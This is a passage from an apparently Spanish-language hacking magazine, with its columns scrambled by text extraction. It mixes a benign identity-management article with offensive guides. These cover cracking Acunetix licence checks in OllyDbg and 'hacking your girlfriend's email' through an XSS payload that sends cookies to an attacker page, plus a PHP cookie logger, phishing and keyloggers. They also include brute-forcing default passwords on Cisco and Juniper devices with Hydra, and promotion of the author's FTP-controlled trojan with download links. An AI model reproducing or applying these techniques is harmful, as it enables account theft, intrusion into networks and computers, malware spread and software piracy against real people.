cencia debe valer 1 el contenido del buffer.
En mi experiencia en diferentes software co-
merciales he visto este problema que utilizan
comparaciones en diferentes partes o ubicaciones
del programa hacia la misma dirección de memoria
para ver si el soft esta registrado, ellos piensan que es
un método anti-cracking por si alguien se le ocurre par-
chear únicamente ese salto condicional, tambien en algún
momento debe meterle contenido a ese buffer, veamos si mis
sospechas son ciertas busquemos si alguien mas usa esa dirección
de memoria, hagamos click derecho y “find references to: address
constant”, veamos.
Como les decia mis sospechas eran cier- de la licencia, pongamos un Break Point
tas pues el software utiliza esa direccion en todos ellos y ahora si ejecutemos el
de memoria en muchisimos otros luga- Olly debugger y veamos en donde para-
res, posiblemente para hacer chequeos ra, veamos.
www.hackingmexico.mx 31
crackeando acunetix
32 www.hackingmexico.mx
hackeando correos
T
al vez la primera inquietud de muchos al iniciar-
se en el mundo del hacking, es “Puedo hackear el
Hac
C
email de mi novia?” La respuesta simple es SI,
pero sigue leyendo, no te emociones tanto.
Por M.C Raul
Lo primero que debes entender es: Robles Aviles
• No todos los correos se pueden hackear Megabyte
• No es un proceso rapido que lleve 2 clicks
Site Scripting), pero este tipo de bugs aparecen una vez cada
Los metodos que voy a describir, son los unicos que fun- año bisiesto, y duran muy pocas horas activos.
cionan, en la red podras encontrar algunos falsos que solo
tratan de robar tu información. La forma de explotarlo seria encontrar donde se pueda in-
yectar codigo en la pagina del correo, por ejemplo
XSS
http://facebook.com/app.php?”><script language=
Un verdadero “hackeo” de cuentas de Hotmail, Gmail, etc “JavaScript”>document.location=”http://tupagina.com/
significaria un error en la programación de estas platafor- cookie.php?cookie=” + document.cookie;document.
mas, el mas famoso y facil de explotar seria un XSS (Cross location=”http://tupagina.com”</script>
CODIGO DE COOKIE.PHP:
<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’],
“unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
34 www.hackingmexico.mx
keando
o
hackeando correos
orreos
mito
realidad
Una vez armado esto, hace que la victima abra tu pagina
donde este un iframe con el codigo que roba la cookie, una
FUERZA BRUTA
Hoy en dia es casi imposible realizar estos ataques debido a que
vez teniendo la cookie, puedes utilizar plugins de Firefox el sistema te banea después de ciertos intentos, pero consiste
para editar la cookie y loguearte a la cuenta de la victima. en utilizar un diccionario de palabras o de passwords comunes
para intentar entrar a la cuenta. Es un metodo lento, y tedioso,
INGENIERIA SOCIAL puedes llevarte semanas y jamas dar con el password.
Este es el metodo mas comun y sencillo, consiste en enviarle
a la victima una pagina falsa que le pida su contraseña, por KEYLOGGERS
ejemplo una postal de un admirador secreto, que al hacer Esto requiere que le instales un software de keylogger a la vic-
click pida usuario y contraseña para poder verla. La efecti- tima, necesitarias enviarle un archivo y que ellos lo ejecuten,
vidad depende de que tanta experiencia tenga la victima con tambien existen keyloggers de hardware donde se conecta el
este tipo de ataques. teclado a este dispositivo que guarda todas las teclas, pero para
esto necesitas acceso fisico a la computadora de la victima
0DAYS
Estos son mas raros de encontrar, como en Gmail que permitia
resetear el password de cualquier usuario mediante la inyeccion
de un carácter de salto de linea, salvo que tu descubras un bug
de estos, o estes en el momento justo, y en el lugar indicado, es
posible que jamas veas activo un error de esta magnitud. Estos
son los mas efectivos ya que si permiten un hackeo casi instan-
taneo, pero son difíciles de conseguir.
www.hackingmexico.mx 35
identity and access management
Identity
andAccess
Management
SIMPLIFICA Y ASEGURA ADMINISTRACIÓN
Identity and Access Management DE ACCESOS
(IAM) certifica que las personas den- En un IAM el acceso a las aplicacio-
tro de una organización tengan los nes puede estar definido por políticas
permisos y servicios que deban de de negocio, políticas de seguridad y
tener, no más y no menos, para ejer- requerimientos del usuario.
cer su labor, los cuales, la mayoría de
las veces, se encuentran distribuidos Debemos crear un mapeo en el cual
y hasta cierto punto duplicados entre asociemos grupos de usuarios con con-
las aplicaciones de una organización troles de acceso, esto lo podemos lograr
utiliza. Imaginen cuántas brechas de construyendo roles y flujos de procesos
seguridad se pueden encontrar en un que se adecuen a las necesidades del
modelo de este estilo. grupo de usuario que estamos clasifi-
cando. Posteriormente se mapean los
A partir de aquí estaremos constru-
La solución es utilizar esa misma in- privilegios a los roles, se asignan roles
yendo un modelo en base al single
formación sobre los usuarios en todas a los flujos y se asignan identidades a
sign-on, esto quiere decir que para
las aplicaciones. IAM unifica estas los roles. Esta parte es la más talachuda,
entrar a cualquier aplicación sola-
identidades para manejarse de mane- pero una vez que tengamos esto todo lo
mente se requiere un id de usuario,
ra centralizada y así poder aplicar las demás será pan comido.
y la forma de autenticar, o sea, com-
políticas y procedimientos desde un
probar que es quién dice ser, deberá
punto. Esto simplifica la construcción ADMINISTRACIÓN
de ser compleja.
de solamente un punto de referencia DE IDENTIDADES
que funcione para todas las aplicacio- Se requiere un mapeo de roles y reglas
nes y asegura las identidades de los a usuarios específicos que permitan el
usuarios consolidando la infraestruc- acceso apropiado a los servicios. A su
tura de muchos a uno y reduciendo vez, se requiere crear un proceso que
las brechas de seguridad de un estado administre y lleve registro de accesos
abrumador a manejable. a sistemas y datos, este proceso se
debe encargar del aprovisionamiento
CONSTRUYENDO UN IAM de servicios a los usuarios definidos
El primer paso para construir un IAM por el rol que les corresponda; tam-
es identificar el flujo de datos en una or- bién se debe de establecer un flujo de
ganización sobre los usuarios y decidir trabajo el cual define cómo se hará
qué datos son relevantes de las entida- este aprovisionamiento y por último
des fuente (Recursos Humanos, Control debe de considerarse que estos proce-
Escolar, etc.), consolidar y actualizar la sos puedan ser auditables.
información de todas las identidades en
una sola identidad para todos los usua-
rios de una organización.
36 www.hackingmexico.mx
identity and access management
Ayudando a la organización
Por
Annika Pringles
@annikapringles
www.hackingmexico.mx 37
cisco/juniper
CISC
E
l sistema operativo de
Microsoft (Windows)
por ser el mas usado
es objeto de constantes
ataques, al igual los sistemas
operativos de equipos de
Redes mas usados como son
CISCO y JUNIPER, también
están siendo objeto de testeo
JUNI
para su vulneración. Y como
tal estos también cuentan con
sus actualizaciones y/o parches
para corregir sus problemas de
seguridad.
Equipos JUNIPER:
Equipos CISCO:
38 www.hackingmexico.mx
CO/
cisco/juniper
IPER
mente, he aquí el problema, se dejan
comúnmente abiertos los puertos 80,
443 y 22 que son respectivamente
http, https y SSH.
seguridad donde dejan las contraseñas
por default, se imaginan como cuales:
admin, root, 654321, qwerty y si tie-
nes conocimientos previos a estos
Por
Ing. Manuel Dublan aka.
t3zc4
www.hackingmexico.mx 39
cisco/juniper
A Continuación se mostrara
en un ejemplo de ataque de
Bru
for
diccionario para tener acceso
al equipo, ocuparemos BT 5
con sus tools xhydra (ataque de
diccionario o también conocido
como Brute force) y zenmap
(Escaneo de puertos), teniendo en
cuenta algunos aspectos descritos
anteriormente.
1
Lo primero es conocer la IP de
nuestra victima en este caso del
equipo y realizar un escaneo de
puertos, este se puede realizar con
nmap o zenmap.
2
Obtenidos que puertos se encuentran
abiertos creamos dos archivos de
texto sobre el escritorio de BT. Un
archivo es para el user y el otro para
los passwords.
40 www.hackingmexico.mx
ute
cisco/juniper
3
Abrimos uno de esos archivos para editarlo e
ingresamos en este caso todos aquellos posibles
passwords que creemos darán resultado.
rce
automáticamente se abrirá la tool, en la pestaña target
indicaremos la IP del equipo y el puerto por donde queremos
intentar descifrar el user pass.
4
En la pestaña Passwords podemos indicarle que intente
5
con un solo user y pass o utilizar los archivos de texto que
creamos en el escritorio de BT como se ve en la imagen, así Por ultimo en la solapa Start le diremos que
intentara con la lista que hayamos ingresado. de comienzo al ataque, si los archivos de texto
o diccionarios son muy grandes y el user pass
muy complejos tardara mucho pero si son por
default o no muy complejos no tardara mucho
en encontrarlos y nos dira valid password found.
www.hackingmexico.mx 41
nxt controler
NxtControler
Un troyano
Paradivertirse Por
Fernando I. Nequis
N
xt Controler es un virus de Cuando cree esta aplicación, la cree tro servidor Ftp Y darle clic en Try, en
tipo Troyano que recibe para que todo newbie pueda empezar la barra inferior de status nos aparecerá
comandos de un emisor re- a manipular computadores remotos, así Try Succesful si es que esta correcto,
moto vía Ftp, los cuales al que cree un panel de Creación Llamado si no aparece esto debemos checar que
recibirse ejecutan una acción predeter- “NXT CONTROL MAKER”, el cual todo esté bien escrito, después pasamos
minada, La lista de comandos consta de te permite personalizar tu propio Nxt- a la parte derecha donde se encuentra un
comandos básicos y divertidos, Cada controler para que lo puedas utilizar y cuadro de texto, en este cuadro de texto
comando esta en corchetes, hasta ahora controlar otras pc. En este Articulo te debemos poner donde queremos que se
la lista es algo corta pero seguiremos ac- enseñare a como personalizar tu NXT- creen los archivos, en la parte inferior
tualizando, ahora mismo trabajamos en Controler. La aplicación de Creación la esta una lista de los archivos que quere-
la manipulación de archivos. puedes encontrar en mi pagina web: mos crear, en la cual se encuentran:
• Command List: Crea un archivo
• [END]-Termina la aplicación http://nxthacks.webs.com/nxt- de texto con la lista de todos los
Remota control comandos y sus usos.
• [SHUTDOWN]-Apaga el • Portable Exe: Es el virus Recep-
computador http://www.hackingmexico.mx/ tor Portable.
• [RESTART]-Reinicia el nxthacks • Instaler Exe: Es el virus Recep-
computador tor instalable, solo lo debes eje-
• [LOG-OFF]-Cierra sesión http://neqprojects.webs.com/ cutar y automáticamente se copia
• [PSY]-Abre el video en youtube nxtcontrol.htm en inicio para que inicie cada que
de Oppa Gangnam style se prende el ordenador, se copia
• [CD-OPEN]-Abre la bandeja de Esta es una aplicación portable, y es con el nombre de “Conexiones de
CD´s fácil de usar: (Figura 1) Red” por seguridad.
• [CD-CLSE]-Cierra La bandeja • Remote Controler: Es el progra-
de CD´s Para crear nuestro NXT-Controler ne- ma emisor de Comandos.
• [CLEAR]-Limpia la ventana de cesitamos un servidor FTP dedicado, yo • Test Exe: Es el virus receptor,
comandos recomiendo usar la compañía 000we- pero este no se esconde y es por-
• [MNTOR-OFF]-Apaga el bhost.com porque es gratis y fácil, de- table lo cual te permite ver su co-
monitor bemos ingresar la información de nues- rrecto funcionamiento.
• [HD-TSKBR]-Esconde la barra
de tareas
• [SW-TSKBR]-Muestra la barra
de tareas
• [BGRND-1]- Cambia el Fondo
por latin lover
• [BGRND-2]-Cambia el fondo
Por una chica sexy
• [Kill[Proceso]-Termina el
proceso escrito
• [MSG[Mensaje]-Manda un
Messagebox con el mensaje
escrito
• [UNINSTALL]-Elimina todo
rastro de el virus
(Figura 1)
42 www.hackingmexico.mx
nxt controler
.TXT .TXT
EMISOR RECEPTOR
(Figura 2)
Debemos Aceptar los términos para debemos teclear ENTER y para poder
crear el archivo, y le damos en el escribir debemos de darle clic al cua-
botón create, Se creara un archivo dro de texto.
DATA.dat este siempre debe estar
presente ya que este contiene las con-
figuraciones de el servidor FTP.
REMOTE CONTROLER
(EMISOR) El cuadro Verde Que se encuentra
En la pantalla principal de el emisor en la esquina superior izquierda indi-
tenemos que insertar la información ca si esta escuchando o está enviando,
de nuestro servidor, así podremos ini- cuando aparece es que está escuchan-
ciar sesión y empezar a atacar. do por lo cual no nos permitirá escri-
bir hasta que le demos clic a donde
queremos escribir esto lo apagara has-
ta que enviemos un ENTER, esto lo
activara y seguirá escuchando.
RECEPTOR O VIRUS
En este screenshot mostraremos como
es que se ve el test o el de prueba, ya
que en realidad cuando se ejecuta este
no se ve ,En la parte superior es donde
se muestran los comandos y lo envia-
do por el emisor, en este caso aparece
“Hola Mi Lord” esto ocurre ya que
al crearse los archivos en el servidor
se guarda así el archivo de texto, tu
puedes enviar texto con el emisor asi
como una conversación y el receptor
la recibirá aunque este no hará nada,
Una vez iniciados Sesión podemos
cada que recibe un comando este res-
empezar a enviar comandos, para esto
ponde diciendo que el comando ha
solo tenemos que escribir comandos,
sido ejecutado.
por default se escribirán en mayus,
no debemos olvidar que todos vienen
entre corchetes, y que para enviar solo
www.hackingmexico.mx 43
#02
Ingeniería social
Bypassing de Uploaders
WarDriving
Hackeando Correos